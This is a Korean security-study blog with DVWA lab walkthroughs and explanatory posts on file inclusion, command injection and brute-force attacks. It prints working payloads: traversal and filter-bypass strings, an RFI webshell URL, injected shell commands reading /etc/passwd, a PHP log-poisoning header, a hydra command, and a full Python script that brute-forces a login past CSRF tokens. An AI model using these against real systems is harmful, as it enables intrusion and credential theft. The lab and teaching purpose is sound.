제나나's 블로그

[DVWA 실습] File Inclusion

제나나 — Wed, 22 Jan 2025 18:30:15 +0900

[DVWA 실습] File Inclusion

✔ 공격대상 :

`file1.php`링크를 누르면 아래와 같은 결과가 나온다.

`localhost/dvwa/vunlerabilities/fi/?page=file1.php`에서 `page=file1.php` 부분을 `page=file4.php`로 입력하면, File Inclusion 공격이 잘 진행되는지 알 수 있다.

page=file4.php를 입력

page 파라미터를 조작해서 원하는 파일을 실행시키는 공격을 진행하면 된다.

1. Low Level

LFI 공격

page 파라미터값에 `page=../../../../../../etc/passwd`을 입력하여 서버의 `/etc/passwd`파일을 읽도록한다.

RFI 공격

page 파라미터값에 `page=http://naver.com`을 입력하면 외부의 링크 실행시킬 수 있다.

네이버 주소 말고 웹셸 주소(예:` http://www.webshell.com/r57.php`)를 입력하면 공격자가 미리 외부에 업로드해 놓은 webshell을 실행시킬 수 있다.

2. Medium Level

Low Level에서 실행되었던, `page=../../../../../../etc/passwd`와 `page=http://www.naver.com` 둘 다 실행이 되지 않는다.

✔ 소스코드 확인하기

소스코드를 확인해 보면 `http://`, `https://`, `../`, `..\`가 입력되면 ""(공백)으로 대체된다.

필터링되지 않는 문자열을 찾아야 한다.

LFI 공격

`../`는 공백으로 치환되므로, `../`를 `../`사이에 넣으면 된다.

그러면 `....//`가 되는데, `....//`에서 `../`만 공백으로 대체되기 때문에, `../`이 남게 된다.

`....//....//....//....//....//....//etc/passwd`를 넣게된면, `../`이 공백으로 치환되면서 `../../../../../../etc/passwd`가 남게 되면서 공격에 성공하게 된다.

RFI 공격

위의 LFI공격과 마찬가지로 필터링되는 문자열을 겹쳐서 넣으면 된다. (`http://` 를 공백으로 치환하니까, `http://` 사이에 `http://`를 넣어 주면 된다)

`hhttp://ttp://http://www.naver.com`을 넣어준다면, `http://www.naver.com`으로 치환되면서 공격에 성공하게 된다.

3. High Level

High level에서는, low와 medium의 공격 방식이 통하지 않는다.

✔ 소스코드 확인

소스코드를 확인해 보면, 'page'인자값인 `$file`값이 `file*` 패턴에 맞지 않고, `include.php`와도 일치하지 않으면 에러 메시지를 출력하고 종료한다. 즉, `file`로 시작하고 `include.php`가 포함되어 있어야만 실행되는 것을 확인할 수 있다.

그렇기 때문에 `http://`로 시작하는 외부 URL을 삽입하는 `RFI 공격`은 실행되지 않는다는 것을 알 수 있다.

LFI 공격

`file:///`로 로컬 파일을 불러올 수 있다. 인자값으로 `file:///../../../../../etc/passwd`를 입력하면 파일이 불러와진다. 공격 성공!

RFI

필터링으로 공격 불가

4. Impossible Level

✔ 소스코드 확인

소스코드를 확인해 보면, `page` 인자값으로 정확한 파일명을 입력하지 않으면 실행되지 않아서 공격이 불가능하다는 것을 알 수 있다.

[웹 해킹] File Inclusion 공격

제나나 — Sun, 19 Jan 2025 14:30:47 +0900

[웹 해킹] File Inclusion 공격

1. 개요

File Inclusion은 웹 애플리케이션에서 사용자가 제공한 입력 값을 통해 서버에 있는 파일을 액세스 하거나 실행하도록 만드는 공격 기법이다. 일반적으로 대상 애프리케이션에 구현된 `동적 파일 인클루전` 메커니즘을 악용한다. 이 취약점은 적절한 검증 없이 사용자가 제공한 입력을 사용하기 때문에 발생한다. 이 공격은 `Local File Inclusion(LFI)`와 `Remote File Inclusion(RFI)`의 두가지 주요 유형으로 나뉜다. `LFI`는 서버 내(로컬) 파일에 접근하는 공격이고, `RFI`는 외부에 있는 파일을 원격으로 include하는 공격이다.

2021 OWASP TOP 10 중에서는 `Broken Access Control`과 `Vulnerable and Outdated Components`에 해당된다.

`Broken Access Control` 항목은 사용자 입력을 적절히 검증하지 않아서 사용자가 허용되지 않은 파일이나 디렉토리에 접근할 수 있는 경우이다. `file inclusion` 공격은 경로탐색(`../`)이나 입력값 변조를 통해 파일에 직접 접근하여 민감한 데이터에 접근이 가능해진다.
`Vulnerable and Outdated Componets` 항목은 서버에서 사용 중인 컴포넌트(프레임워크, 라이브러리 등)가 취약하거나 오래된 경우 발생한다. `file inclusion` 공격의 경우 오래된 PHP 설정에서 `allow_url_include`가 활성화 되어 있으면 RFI 공격이 가능하다.

2. LFI (Local File Inclusion)

공격자가 애플리케이션 서버에서 로컬 파일을 읽거나 실행하도록 강제하는 공격이다.

서버의 중요한 파일(`/etc/passwd`, 로그파일, 소스코드 등)을 읽거나 악성스크립트를 실행시키기 위해 사용된다.

예시 : `http://example.com/index.php?page=../../../../../../../etc/passwd`

URL에 파일 경로를 포함해서 공격을 하면, 서버에서 `/etc/passwd` 파일을 읽어서 출력하도록 한다.

만약, 서버 디렉토리 내부에 Web Shell이 있다면, File Inclusion 취약점이 있는 페이지를 통해서 Web Shell에 접근할 수도 있다.

다른 공격으론, HTTP-Agent에 `<?php passthru('command');?>` 라는 php코드를 넣어 패킷을 보내면, Apache server의 error.log파일(error.log.php)에 공격 코드가 삽입되고, LFI 공격으로 해당 로그파일을 읽어와 명령어 실행이 가능해진다.

HTTP Message (Request)
GET /../error.log HTTP/1.0
User-Agent : <?php passthru('command');?>
Accept: text/html; */*
Referer: http://www.example.com/index.php
Host: www.example.com

메시지 본문

3. RFI (Remote File Inclusion)

LFI와 동일한 환경에서 발생될 수 있으며, 차이점은 원격지 파일을 삽입하여 내부 파일처럼 인식시킨다는 점이다.

RFI는 공격자가 원격 서버에 호스팅된 악성 파일을 포함하여 애플리케이션 내에서 실행하도록 유도하여 웹 어플리케이션을 손상시키거나 서버를 제어하기 위한 목적으로 사용된다.

예시 : `http://example.com/index.php?page=악성URL`

URL에 파일 경로를 포함해서 공격을 하면, 서버에서 악성파일을 실행하도록 한다.

✔ 조건 : php설정 파일인 `php.ini`에서 `allow_url_fopen=On` 및 `allow_url_include=On`으로 설정되어 있어야 원격지 사이트 호출이 가능하다.

4. 발생 원인

;" data-ke-size="size16"> 사용자의 입력에 대한 검증 부족

경로 필터링 미비 경로탐색(`../`)이 제대로 필터링되지 않음.

동적 파일 포함 PHP의 `include`나 `require` 같은 동적 파일 포함 함수에 사용자 입력을 직접으로 사용

5. 방지법

입력값 검증

사용자 입력값에서 경로탐색(`../`)이나 원격 URL 필터링,

허용된 파일만 로드하도록 화이트리스트 적용

파일 경로 고정 포함할 파일 경로를 특정 디렉터리로 제한

PHP 설정 변경 `allow_url_fopen=Off` 및 `allow_url_include=Off`

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion

WSTG - Latest | OWASP Foundation

WSTG - Latest on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.

owasp.org

[DVWA 실습] Command Injection

제나나 — Thu, 16 Jan 2025 23:30:31 +0900

[DVWA 실습] Command Injection

✔ 공격 대상 :

입력창은 IP 주소를 넣어 ping을 확인하는데, 이곳을 통해서 다른 시스템 명령어가 실행되도록 하면 된다.

1. Low Level

우선, IP주소를 넣으면 아래와 같이 뜬다.

해당 검색창에 시스템 명령어를 넣어 보았다.

1) `ls`

아무것도 뜨지 않는다.

2) `127.0.0.1; ls`

IP 주소 뒤에 `;`을 붙이고 시스템 명령어(`ls`)를 입력하였다.

`ping 127.0.0.1` 결과와 함께 `ls` 결과가 나온다.(성공 )

3) `127.0.0.1; cat /etc/passwd`

추가적으로 계정정보도 확인해 보았다.

`ping 127.0.0.1` 결과와 함께 `cat /etc/passwd` 결과도 나온다. (성공 )

✔ 소스 코드 :

IP 주소를 입력하면 `ping` 명령을 실행하는데, 입력값에 대해서 검증이 없으므로 세미콜론(`;`)을 입력하고 다른 명령어를 추가로 전송할 수 있다.

2. Medium Level

우선, IP주소를 넣으면 아래와 같이 뜬다.

1) `127.0.0.1; ls`

Low level에서는 `ls`명령어가 실행 되었으나, medium level에서는 실행이 되지 않는다.

✔ 소스 코드 확인

소스 코드를 확인해보면, `&&`와 `;`가 빈칸으로 필터링되는 것을 알 수 있다. 그렇기 때문에, 두 가지 경우를 우회하여 시스템 명령어를 실행할 수 있는 방법을 알아내야 한다.

`cmd1| cmd2` : (파이프) `|`를 사용하면 cmd1의 출력을 cmd2의 입력으로 전달합니다. cmd1이 성공하거나 실패하더라도 cmd2는 실행됩니다.
`cmd1; cmd2` : (순차실행) `;`를 사용하면 cmd1의 실행이 끝난 후, 성공여부와 상관없이 cmd2가 실행됩니다.
`cmd1|| cmd2` : (OR 논리연산) cmd1 실행이 실패할 경우에만 cmd2가 실행됩니다.
`cmd1&&cmd2` : (AND 논리연산) cmd1 실행이 성공할 경우에만 cmd2가 실행됩니다.
`$(cmd)` : (명령어 치환) cmd의 실행 결과를 캡처하여 다른 명령어의 일부로 사용합니다. 예를 들어 `echo $(whoami)` 에서 `whoami` 명령어의 출력 결과를 포함하여 `사용자이름`을 출력합니다.
`cmd` : 특정 명령어를 실행하는 데 사용됩니다.
`>(cmd)`: (프로세스 치환-출력) `>(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어로 보냅니다. 파일을 필요로 하는 명령어와 함께 사용됩니다.
`<(cmd)`: (프로세스 치환-입력) `<(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어가 입력으로 사용합니다.

2) `127.0.0.1| ls`

`;`(세미콜론) 대신에 `|`(파이프)를 입력했는데 성공하였다.

`cmd1 | cmd2`이면, cmd1의 출력을 cmd2의 입력으로 전달한다. cmd1이 성공하거나 실패하더라도 cmd2는 실행된다.

3) `127.0.0.1 & ls`

`&`은 쉘에서 명령을 백그라운드로 실행하도록 하는 명령어이다.

ping 명령어는 백그라운드에서 실행되고, 쉘은 다음 명령어를 바로 처리하도록 한다.

그래서, `ls`명령어가 먼저 실행된 다음에 백그라운드로 `ping 127.0.0.1`이 실행된다.

3. High Level

역시나 IP를 입력하면, ping결과가 나온다.

1) `127.0.0.1; ls`, `127.0.0.1| ls`, `127.0.0.1 & ls`

Low level, Medium level에서 가능했던 명령어가 실행되지 않음을 알 수 있다.

✔ 소스 코드 확인

더 많은 특수문자들이 필터링된 것을 알 수 있다.

코드를 자세희보면, `| `부분에 띄어쓰기가 된 것을 볼 수 있다. 개발자의 코딩 실수로 문자 blacklist 방식이 우회가 가능하게 된 것이다.

띄어쓰기 없이 `|` 뒤에 명령어를 입력하면 필터링되지 않을 것이다.

2) `127.0.0.1|ls` (띄어쓰기 없이)

성공!

4. Impossible Level

지금까지 시도했던 우회기법들 전부 사용 불가인 것을 알 수 있다.

✔ 소스 코드 확인

소스 코드를 확인하면, IP 형식만 입력 가능한 것을 알 수 있다. (숫자.숫자.숫자.숫자 형식만 가능)
입력값 검증을 통해서, 필요한 정보만 입력하도록 설정하여 Command Injection 공격을 불가능하도록 만들었다.

[웹 해킹] Command Injection

제나나 — Thu, 16 Jan 2025 01:30:39 +0900

[웹 해킹] Command Injection

1. 개요

Command Injection은 애플리케이션이 시스템 명령어를 실행하기 위해 사용자의 입력을 포함할 때, 공격자가 입력을 조작하여 추가 명령어를 삽입하거나 실행하도록 만드는 방식

공격 조건 :

1. 애플리케이션이 운영체제 명령어를 호출해야 하는 경우

2. 입력값에 대한 검증이 충분하지 않은 경우

Command Injection 공격은 2021 OWASP Top 10에서 `Injection`에 해당된다.

2. 공격 예시

예시1

<?php
if (isset($_GET['ip'])) {
    $ip = $_GET['ip'];
    $output = shell_exec("ping -c 4 " . $ip);
    echo "<pre>$output</pre>";
}
?>

위와 같이 `ping` 명령어에 사용자 입력($ip)을 포함하여서 실행되는데, 공격자가 입력값을 조작하여 추가 명령어를 수행할 수 있음.

Unix/Linux일 때 예시 : `8.8.8.8; cat /etc/passwd`

윈도일 때 예시 : `8.8.8.8 && dir`

예시2

웹 애플리케이션에서 파일 이름이 URL에 표시되는 경우가 많다. Perl은 프로세스에서 열린 문장으로 데이터를 파이프로 연결할 수 있다. 파일 이름 끝에 파이프 기호 `|`를 추가하면 된다.

[예시]

`https://sensitive/cgi-bin/userData.pl?doc=user1.txt`

`https://sensitive/cgi-bin/userData.pl?doc=/bin/ls|`

이렇게 URL을 수정하면, `/bin/ls` 명령어가 실행된다.

예시3

.php 페이지의 URL 끝에 세미콜론 (`;`)을 추가한 다음에 운영체제 명령어를 입력하면 명령이 실행된다. `%3B`는 URL 인코딩이 되어 있어 세미콜론(`;`)으로 디코딩된다.

[예시]

`https://sensitive/something.php?dir=%3Bcat%20/etc/passwd`

(URL 디코딩) `https://sensitive/something.php?dir=;cat /etc/passwd`

예시4

인터넷에서 탐색할 수 있는 문서 집합을 포함하는 애플리케이션의 예로, `Burp Suite`와 같은 프록시툴로 실행하면 다음과 같은 POST HTTP를 얻을 수 있다.

POST /public/doc HTTP/1.1
Host: www.example.com
[...]
Referer: https://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf

이제 POST HTTP에 주입할 운영 체제 명령을 추가할 수 있는지 테스트할 수 있습니다.

POST /public/doc HTTP/1.1
Host: www.example.com
[...]
Referer: https://127.0.0.1/WebGoat/attack?Screen=20
Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf+|+Dir c:\

문서 경로에 `|`을 추가하여 `Dir c:\`라는 시스템 명령어 실행

애플리케이션이 요청을 검증하지 않으면 다음과 같은 결과를 얻을 수 있음.

    Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+|+Dir c:\'
    Output...
    Il volume nell'unità C non ha etichetta.
    Numero di serie Del volume: 8E3F-4B61
    Directory of c:\
     18/10/2006 00:27 2,675 Dir_Prog.txt
     18/10/2006 00:28 3,887 Dir_ProgFile.txt
     16/11/2006 10:43
        Doc
        11/11/2006 17:25
           Documents and Settings
           25/10/2006 03:11
              I386
              14/11/2006 18:51
             h4ck3r
             30/09/2005 21:40 25,934
            OWASP1.JPG
            03/11/2006 18:29
                Prog
                18/11/2006 11:20
                    Program Files
                    16/11/2006 21:12
                        Software
                        24/10/2006 18:25
                            Setup
                            24/10/2006 23:37
                                Technologies
                                18/11/2006 11:14
                                3 File 32,496 byte
                                13 Directory 6,921,269,248 byte disponibili
                                Return code: 0

3. 취약한 함수

Command Injection에 사용할 수 있는 특수문자 : `| ; & $ > < ' !`

`cmd1|cmd2` : (파이프) `|`를 사용하면 cmd1의 출력을 cmd2의 입력으로 전달합니다. cmd1이 성공하거나 실패하더라도 cmd2는 실행됩니다.
`cmd1;cmd2` : (순차실행) `;`를 사용하면 cmd1의 실행이 끝난 후, 성공여부와 상관없이 cmd2가 실행됩니다.
`cmd1||cmd2` : (OR 논리연산) cmd1 실행이 실패할 경우에만 cmd2가 실행됩니다.
`cmd1&&cmd2` : (AND 논리연산) cmd1 실행이 성공할 경우에만 cmd2가 실행됩니다.
`$(cmd)` : (명령어 치환) cmd의 실행 결과를 캡처하여 다른 명령어의 일부로 사용합니다. 예를 들어 `echo $(whoami)` 에서 `whoami` 명령어의 출력 결과를 포함하여 `사용자이름`을 출력합니다.
`cmd` : 특정 명령어를 실행하는 데 사용됩니다.
`>(cmd)`: (프로세스 치환-출력) `>(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어로 보냅니다. 파일을 필요로 하는 명령어와 함께 사용됩니다.
`<(cmd)`: (프로세스 치환-입력) `<(ls)` 명령어의 출력을 임시 파일이나 스트림으로 만들어 다른 명령어가 입력으로 사용합니다.

PHP

- `system`, `shell_exec`, `exec`, `proc_open`, `eval`

Shell Scripts

- 모두 실행 가능

Perl

- `open`, `sysopen`, `glob`, `system`, `eval`

Java

- `Runtime.exec()`

C, C++

- `system`, `exec`, `ShellExecute`

(strcpy strcat sprintf vsprintf gets strlen (특별히 null 바이트와 함께 사용될 경우) scanf() fscanf sscanf vscanf vsscanf vfscanf realpath getopt getpass streadd strecpy strtrns)

Python

- `exec`, `eval`, `os.system`, `os.popen`, `subprocess.popen`, `subprocess.call`

4. 예방방법

- 사용자 입력값 검증

- 명령어 실행 회피

* 시스템 명령어 대신 안전한 API 사용 등

- 입력값 이스케이프 처리

- 최소 권한 사용

https://owasp.org/Top10/A03_2021-Injection/

A03 Injection - OWASP Top 10:2021

A03:2021 – Injection Factors CWEs Mapped Max Incidence Rate Avg Incidence Rate Avg Weighted Exploit Avg Weighted Impact Max Coverage Avg Coverage Total Occurrences Total CVEs 33 19.09% 3.37% 7.25 7.15 94.04% 47.90% 274,228 32,078 Overview Injection slide

owasp.org

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection

WSTG - Latest | OWASP Foundation

WSTG - Latest on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.

owasp.org

[DVWA 실습] Brute Force Attack

제나나 — Wed, 15 Jan 2025 20:00:34 +0900

[DVWA 실습] Brute Force Attack

1. Low Level

✔ 공격 대상 : 로그인 페이지

brute force 공격을 해야 하는 로그인 페이지. 무작위로 대입하여 Username이랑 Password를 얻어내면 된다.

✔ 공격 도구 : `Burp Suite` 도구를 이용하여 무차별 공격

1. Burp Suite를 통해서 Proxy 설정을 한다.

2. Proxy 설정 후 `Intercept`를 하게 되면, HTTP Request 되는 패킷을 확인할 수 있다.

GET 방식으로 `username`과 `password` 파라미터 값이 전달 된다.

3. Intruder 이용하기

- Proxy에서 HTTP history에서 원하는 요청의 오른쪽 마우스 클릭 → `Send to Intruder` 클릭

- `Intruder` → `Positions`에서 무차별 공격에 필요한 인자만 선택하면 되고, 값이 변하는 곳에 `$`가 앞뒤로 들어가도록 설정한다.

여기서는 `username`이랑 `password`의 값으로 들어갈 곳을 선택하면 된다.

4. `Payloads`에서 공격하는 방법 2가지

1) 모든 경우의 수를 대입하는 `Brute forcer` 이용하기 (Brute Force 공격)

단점 : 모든 경우의 수를 대입하므로 시간이 많이 든다.

2) 미리 작성된 자주 사용하는 암호가 저장된 `Simple list` 이용하기 (Dictionary 공격)

장점: 모든 경우의 수를 대입하는 것보다 빠르게 값을 찾을 수 있음.

단점: dictonary에 없는 경우 값을 찾을 수 없음.

1) `Brute forcer`

`username`와 `password`에 대한 정보가 전혀 없기 때문에 `simple list`를 이용해 공격을 하였다.

2) `Simple list` 이용하기

`Payload Options [Simpe list]` 항목에 인터넷에 떠도는 dictionary 파일을 넣어서 dictionary list를 구성했다.

* (참고) payload set을 2개로 설정하면, username이랑 password 각각에 대해 dictionary를 이용할 수 있음

✈ 공격 시작 'start attack'

공격 중에 username이 admin이고, password가 password일 때만 Length의 길이가 다른 걸 확인할 수 있다.

로그인 성공했을 때 5524 bytes이고, 실패했을 때 5465 bytes인 걸로 추정이 가능하다.

`admin`/`password`로 로그인을 시도하면,

성공!

✔ 공격 도구 : `hydra` 도구를 이용하여 무차별 공격

hydra는 네트워크 서비스나 웹 애플리케이션에서 무차별 대입 공격을 수행하기 위해서 설계된 오픈 소스 도구.

[사용법]
hydra [옵션] 서비스://타켓
[주요 옵션]
- l 아이디
- L 아이디 리스트 파일
- p 비밀번호
- P 비밀번호 사전파일
F=: 로그인 실패 메시지
S=: 로그인 성공 메시지
H=: 헤더
-v : 자세히
-V : login+pass 보여줌
-f : 비밀번호를 발견하면 종료
-t : 동시에 실행하는 작업수 (기본값 16)

hydra -L ~/study/id.txt -P ~/study/passwords_quick.txt localhost http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=mtnakaa2ob8drdr68rc8edbum3" -V -f

-L ~/study/id.txt : 사용자 이름 목록 파일 경로

-P ~/study/passwords_quick.txt : 비밀번호 목록 파일 경로

localhost : 공격 대상의 주소

http-get-form : HTTP GET 요청

username=^USER^&password=^PASS^&Login=Login : 로그인 폼에 전송될 데이터 (^USER^는 사용자 이름 목록에서 하나씩 대체되고, ^PASS^는 비밀번호 목록에서 하니씩 대체)

2. Medium Level

low level과 앞의 과정을 동일하게 하면 같은 결과를 얻을 수 있다.

✔ low level과의 차이점은 계정 정보를 얻는데 시간이 더 오래 걸린다는 것이다.

`sleep(2);` 함수가 실행되어 login failed시 2초의 대기시간이 발생한다.

3. High Level

low level이랑 medium level처럼 공격을 시도하면, 기존과 다르게 Status code 302가 뜬다. 302 HTTP 응답 상태 코드는, 클라이언트가 요청한 리소스가 임시적으로 다른 URL로 이동되었음을 나타낸다. 이는 임시 리다이렉션을 의미하며, 클라이언트는 새 URL로 요청을 보내야 한다.

302 상태 코드의 주요 특징
- 임시 이동: 서버가 클라이언트를 새 URL로 이동시키지만, 원래 URL은 여전히 유효합니다.
- 클라이언트 동작: 클라이언트(웹 브라우저)는 보통 Location 헤더에 지정된 새 URL로 자동 요청을 보냅니다.
- HTTP 메서드 유지: 클라이언트는 원래 요청의 HTTP 메서드(GET, POST 등)를 유지합니다. 하지만 일부 브라우저는 POST 요청을 GET 요청으로 변경할 수 있습니다(비표준 동작).

로그인 페이지에서 로그인을 시도하면 `CSRF token is incorrect`라는 메시지가 뜬다. CSRF token이 설정되어 있어 매번 로그인 시 token 값이 달라지지만, `Brup Suite`로 공격을 시도하면 token값이 로그인 할때마다 같기 때문에 오류(302)가 발생한 것이다.

CSRF token

CSRF(Cross-Site Request Forgery) 공격을 방지하기 위해 웹 애플리케이션에서 사용하는 보안 메커니즘.
CSRF 토큰은 사용자가 의도하지 않은 악의적인 요청을 방지하기 위해서 클라이언트와 서버 간의 요청에서 유효성을 검증하는 데 사용된다.
토큰 생성 : 클라이언트가 서버에 처음 요청했을 때, 서버가 고유한 CSRF 토큰을 생성해서 클라이언트에 거 전송
토큰 전송 : 클라이언트가 이후의 요청에 CSRF 토큰을 포함해서 전송
토큰 검증 : 서버는 요청에서 받은 토큰과 세션에 저장된 토큰을 비교. 일치하지 않거나 없는 경우 요청을 차단

`Burp Suite`로 Request를 확인해보면, 토큰값이 계속 바뀌기 때문에, 기존에 low level, medium level에서 시도했던 brute force 공격이 제대로 작동하지 않는다는 것을 알수 있다.

그렇기 때문에, high level에서 해야 할 것은 매번 로그인마다 유효한 토근을 제공해 주어야 한다. `burp suite`에서는 해당 기능을 수행할 수 없기 때문에, 매번 바뀌는 토큰 값을 넣어주는 자동화된 스크립트를 작성해야한다. (역시... High level)

작성된 Python 코드 :

#!/usr/bin/python
# Quick PoC template for HTTP GET form brute force with CSRF token
# Target: DVWA v1.10 (Brute Force - High)
#   Date: 2015-11-07
# Author: g0tmi1k ~ https://blog.g0tmi1k.com/
# Source: https://blog.g0tmi1k.com/dvwa/bruteforce-high/

import requests
import sys
import re
from BeautifulSoup import BeautifulSoup


# Variables
target = 'http://localhost/dvwa'
sec_level = 'high'
dvwa_user = 'admin'
dvwa_pass = 'password'
user_list = 'id.txt'
pass_list = 'passwords_quick.txt'


# Value to look for in response header (Whitelisting)
success = 'Welcome to the password protected area'


# Get the anti-CSRF token
def csrf_token(path,cookie=''):
    try:
        # Make the request to the URL
        #print "\n[i] URL: %s/%s" % (target, path)
        r = requests.get("{0}/{1}".format(target, path), cookies=cookie, allow_redirects=False)

    except:
        # Feedback for the user (there was an error) & Stop execution of our request
        print "\n[!] csrf_token: Failed to connect (URL: %s/%s).\n[i] Quitting." % (target, path)
        sys.exit(-1)

    # Extract anti-CSRF token
    soup = BeautifulSoup(r.text)
    user_token = soup("input", {"name": "user_token"})[0]["value"]
    #print "[i] user_token: %s" % user_token

    # Extract session information
    session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
    session_id = session_id.group(1)
    #print "[i] session_id: %s" % session_id

    return session_id, user_token


# Login to DVWA core
def dvwa_login(session_id, user_token):
    # POST data
    data = {
        "username": dvwa_user,
        "password": dvwa_pass,
        "user_token": user_token,
        "Login": "Login"
    }

    # Cookie data
    cookie = {
        "PHPSESSID": session_id,
        "security": sec_level
    }

    try:
        # Make the request to the URL
        print "\n[i] URL: %s/login.php" % target
        print "[i] Data: %s" % data
        print "[i] Cookie: %s" % cookie
        r = requests.post("{0}/login.php".format(target), data=data, cookies=cookie, allow_redirects=False)

    except:
        # Feedback for the user (there was an error) & Stop execution of our request
        print "\n\n[!] dvwa_login: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target)
        sys.exit(-1)

    # Wasn't it a redirect?
    if r.status_code != 301 and r.status_code != 302:
        # Feedback for the user (there was an error again) & Stop execution of our request
        print "\n\n[!] dvwa_login: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
        sys.exit(-1)

    # Did we log in successfully?
    if r.headers["Location"] != 'index.php':
        # Feedback for the user (there was an error) & Stop execution of our request
        print "\n\n[!] dvwa_login: Didn't login (Header: %s  user: %s  password: %s  user_token: %s  session_id: %s).\n[i] Quitting." % (
          r.headers["Location"], dvwa_user, dvwa_pass, user_token, session_id)
        sys.exit(-1)

    # If we got to here, everything should be okay!
    print "\n[i] Logged in! (%s/%s)\n" % (dvwa_user, dvwa_pass)
    return True


# Make the request to-do the brute force
def url_request(username, password, user_token, session_id):
    # GET data
    data = {
        "username": username,
        "password": password,
        "user_token": user_token,
        "Login": "Login"
    }

    # Cookie data
    cookie = {
        "PHPSESSID": session_id,
        "security": sec_level
    }

    try:
        # Make the request to the URL
        #print "\n[i] URL: %s/vulnerabilities/brute/" % target
        #print "[i] Data: %s" % data
        #print "[i] Cookie: %s" % cookie
        r = requests.get("{0}/vulnerabilities/brute/".format(target), params=data, cookies=cookie, allow_redirects=False)

    except:
        # Feedback for the user (there was an error) & Stop execution of our request
        print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target)
        sys.exit(-1)

    # Was it a ok response?
    if r.status_code != 200:
        # Feedback for the user (there was an error again) & Stop execution of our request
        print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
        sys.exit(-1)

    # We have what we need
    return r.text


# Main brute force loop
def brute_force(session_id):
    # Load in wordlists files
    with open(pass_list) as password:
        password = password.readlines()
    with open(user_list) as username:
        username = username.readlines()

    # Counter
    i = 0

    # Loop around
    for PASS in password:
        for USER in username:
            USER = USER.rstrip('\n')
            PASS = PASS.rstrip('\n')

            # Increase counter
            i += 1
            # Feedback for the user
            print ("[i] Try %s: %s // %s" % (i, USER, PASS))

            # Get CSRF token
            session_id, user_token = csrf_token('/vulnerabilities/brute/', {"PHPSESSID": session_id})

            # Make request
            attempt = url_request(USER, PASS, user_token, session_id)
            #print attempt

            # Check response
            if success in attempt:
                print ("\n\n[i] Found!")
                print "[i] Username: %s" % (USER)
                print "[i] Password: %s" % (PASS)
                return True
    return False


# Get initial CSRF token
session_id, user_token = csrf_token('login.php')


# Login to web app
dvwa_login(session_id, user_token)


# Start brute forcing
brute_force(session_id)

✔ 코드 출처 : https://blog.g0tmi1k.com/dvwa/bruteforce-high/

DVWA - Brute Force (High Level) - Anti-CSRF Tokens - g0tmi1k

This is the final "how to" guide which brute focuses Damn Vulnerable Web Application (DVWA), this time on the high security level. It is an expansion from the "low" level (which is a straightforward HTTP GET form attack). The main login screen shares simil

blog.g0tmi1k.com

위의 코드를 실행하면, `Username`과 `Password` 획득이 가능하다.

4. Impossible Level

로그인에 한번 실패하며, 15분 뒤에 로그인 시도가 가능하다.

사실상 brute force 공격 시간이 너무 많이 들기 때문에 성공하는 것은 불가능에 가깝다고 볼 수 있다.

[웹 해킹] Brute Force (브루트포스 공격, 무차별 대입 공격)

제나나 — Tue, 14 Jan 2025 22:30:44 +0900

[웹 해킹] Brute Force

(브루트포스 공격, 무차별 대입 공격, 무작위 대입 공격)

1. 개요

인증 시스템을 뚫기 위해서 가능한 모든 조합의 비밀번호 또는 키를 시도하는 공격 기법. 이 공격은 시스템의 취약점을 찾기 위한 가장 기본적인 방법 중에 하나로 단순하지만 성공 가능성이 있음.

대부분의 암호화 방식은 이론적으로 무차별 대입 공격에 대해서 안전하지 못하며, 충분한 시간이 존재하면 암호화된 정보를 해독이 가능함. 하지만, 대부분의 경우 비용이나 시간의 제약 때문에 공격을 방지함.

✔ [참고]
AES 암호 (현재 가장 강력하고 널리 사용되는 암호)가 안전한 이유
AES-128: 키 길이 128비트 → 2^128 가지 키 조합.
AES-192: 키 길이 192비트 → 2^192 가지 키 조합.
AES-256: 키 길이 256비트 → 2^256 가지 키 조합.

무차별 대입공격으로 암호를 푸는데 필요한 시간을 계산하면
AES-128: 2^128 ≈ 3.4×10^38
현재 슈퍼컴퓨터로 초당 10^18번의 키를 검사한다고 가정 시, 평균적으로 1.08 x 10^19년이 걸림. 이는 우주의 나이(약 137억 년)를 훨씬 초과

2021 OWASP TOP 10 중에서는 `Identification and Authentication Failures` 항목에 해당된다.

OWASP TOP 10

OWASP 07. Identification and Authentication Failures
사용자의 신원 확인, 인증 및 세션 관리가 인증 관련 공격으로부터 보호하는 데 중요합니다. 애플리케이션에 다음과 같은 경우 인증 취약점이 있을 수 있습니다.

- 공격자가 유효한 사용자 이름과 비밀번호 목록을 가지고 있는 자격 증명 스터핑과 같은 자동화된 공격을 허용합니다.
- 무차별 대입 공격 또는 기타 자동화된 공격을 허용합니다.
- "Password1" 또는 "admin/admin"과 같은 기본, 약하거나 잘 알려진 비밀번호를 허용합니다.
- 안전할 수 없는 "지식 기반 답변"과 같은 약하거나 비효율적인 자격 증명 복구 및 비밀번호 분실 프로세스를 사용합니다.
- 일반 텍스트, 암호화 또는 약하게 해시된 비밀번호 데이터 저장소를 사용합니다(A02:2021-암호화 실패 참조).
- 누락되거나 비효율적인 다중 요소 인증이 있습니다.
- URL에 세션 식별자를 노출합니다.
